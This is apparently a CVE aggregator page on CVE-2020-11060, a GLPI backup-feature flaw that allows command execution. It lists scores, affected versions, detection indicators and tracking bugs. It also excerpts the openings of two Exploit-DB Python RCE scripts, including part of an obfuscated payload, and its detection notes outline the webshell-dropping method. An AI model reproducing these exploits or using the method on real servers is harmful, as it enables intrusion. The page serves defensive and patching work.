CVE-2020-11060
published 2020-05-12CVE-2020-11060: In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an…
PriorityP269high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
10.95%
95.3th percentile
In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| glpi-project | glpi | < 9.4.6 | 9.4.6 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP GET requests to /front/backup.php with parameters 'dump=dump' and 'fichier=' pointing to a web-accessible path (e.g. /pics/), indicating exploitation of the backup-to-webshell technique. ↗
- →Monitor POST requests to /front/wifinetwork.form.php with unusually large or binary 'comment' field content, which is used to inject the malicious GZIP payload into the database. ↗
- →Alert on newly created .php files appearing under the GLPI /pics/ directory, as the exploit writes a PHP webshell there via the backup dump functionality. ↗
- →The exploit uses the CSRF token pattern 'name="_glpi_csrf_token" value="([a-f0-9]{32})"' — monitor for automated rapid sequential requests to login and wifinetwork pages harvesting CSRF tokens. ↗
- →The exploit fetches the GZIP payload from a remote GitHub raw URL (AlmondOffSec/PoCs); outbound connections from the GLPI server or attacker host to this URL during an attack session are a strong indicator of exploitation. ↗
- ·The 'offsettable' parameter value (312 in the PoC) must match the line number of the 'wifinetworks' CREATE TABLE statement in the SQL dump; this value varies per GLPI installation and database state, so attackers must enumerate it first. ↗
- ·The web-writable output path for the dropped shell differs by platform: C:\xampp\htdocs\pics\ on Windows and /var/www/html/glpi/pics/ on Linux — non-default installations will require path adjustment. ↗
- ·Exploitation requires an authenticated account with both Maintenance privileges and the right to add WiFi networks, or alternatively a CSRF attack against such an account. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
osv8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GLPI GZIP(Py3) 9.4.5 - RCE
exploitdb·2023-10-09
CVE-2020-11060 GLPI GZIP(Py3) 9.4.5 - RCE
GLPI GZIP(Py3) 9.4.5 - RCE
---
#!/usr/bin/env python3
#Exploit Title: GLPI GZIP(Py3) 9.4.5 - RCE
#Date: 08-30-2021
#Exploit Authors: Brian Peters & n3rada
#Vendor Homepage: https://glpi-project.org/
#Software Link: https://github.com/glpi-project/glpi/releases
#Version: 0.8.5-9.4.5
#Tested on: Exploit ran on Kali 2021. GLPI Ran on Windows 2019
#CVE: 2020-11060
# Built-in imports
import argparse
import random
import re
import string
from datetime import datetime
# Third party library imports
import requests
from lxml import html
# https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt
PAYLOAD = ";)qRJ*_O88Ux-0cRlA`B]5y[r.no5bKUb2EzEW34O(K~.Oa}pO}1F956/fp@mz`oQqahP+@[/tiLy:]YBmFrRmc*Jt}VxM^@(9BeSTo|zQ}6d/zF|LOMqSy:Nk5hCLU.s-Tx;fHci?1],*9}r;,FmIDZ5^|0SNYjN}H7z{
Exploit-DB
GLPI 9.4.5 - Remote Code Execution (RCE)
exploitdb·2021-06-14·CVSS 7.4
CVE-2020-11060 [HIGH] GLPI 9.4.5 - Remote Code Execution (RCE)
GLPI 9.4.5 - Remote Code Execution (RCE)
---
# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE)
# Exploit Author: Brian Peters
# Vendor Homepage: https://glpi-project.org
# Software Link: https://github.com/glpi-project/glpi/releases
# Version: | grep "CREATE TABLE" | grep -n wifinetworks
# Update the offsettable value with this number in the create_dump function
# The Nix/Win paths are based on defaults. You can use curl -I and use md5sum to find the path based
# on the Set-Cookie hash.
#!/usr/bin/python
import argparse
import json
import random
import re
import requests
import string
import sys
import time
from datetime import datetime
from lxml import html
class GlpiBrowser:
def __init__(self, url, user, password, platform):
self.url = url
self.user = user
self.password = p
Bugzilla
CVE-2020-11060 glpi: remote code execution via the backup functionality [epel-7]
bugzilla·2020-05-20·CVSS 7.4
CVE-2020-11060 [HIGH] CVE-2020-11060 glpi: remote code execution via the backup functionality [epel-7]
CVE-2020-11060 glpi: remote code execution via the backup functionality [epel-7]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-7.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
Discussion:
Use the following template to for the 'f
Bugzilla
CVE-2020-11060 glpi: remote code execution via the backup functionality
bugzilla·2020-05-20·CVSS 7.4
CVE-2020-11060 [HIGH] CVE-2020-11060 glpi: remote code execution via the backup functionality
CVE-2020-11060 glpi: remote code execution via the backup functionality
In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6.
Reference:
https://github.com/glpi-project/glpi/security/advisories/GHSA-cvvq-3fww-5v6f
Upstream commit:
https://github.com/glpi-project/glpi/commit/ad748d59c94da177a3ed25111c453902396f320c
Discussion:
Created glpi tracking bugs for this issue:
Affects: epel-7 [bug 1838308]
http://packetstormsecurity.com/files/163119/GLPI-9.4.5-Remote-Code-Execution.htmlhttps://github.com/glpi-project/glpi/commit/ad748d59c94da177a3ed25111c453902396f320chttps://github.com/glpi-project/glpi/security/advisories/GHSA-cvvq-3fww-5v6fhttp://packetstormsecurity.com/files/163119/GLPI-9.4.5-Remote-Code-Execution.htmlhttps://github.com/glpi-project/glpi/commit/ad748d59c94da177a3ed25111c453902396f320chttps://github.com/glpi-project/glpi/security/advisories/GHSA-cvvq-3fww-5v6f
2020-05-12
Published